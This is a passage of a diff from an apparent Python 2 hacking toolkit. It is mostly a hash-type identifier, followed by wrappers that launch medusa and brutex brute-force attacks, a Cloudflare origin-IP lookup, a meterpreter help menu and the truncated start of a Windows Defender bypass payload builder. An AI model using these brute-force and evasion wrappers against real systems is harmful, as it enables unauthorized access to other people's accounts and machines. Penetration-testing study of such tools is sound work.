hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File 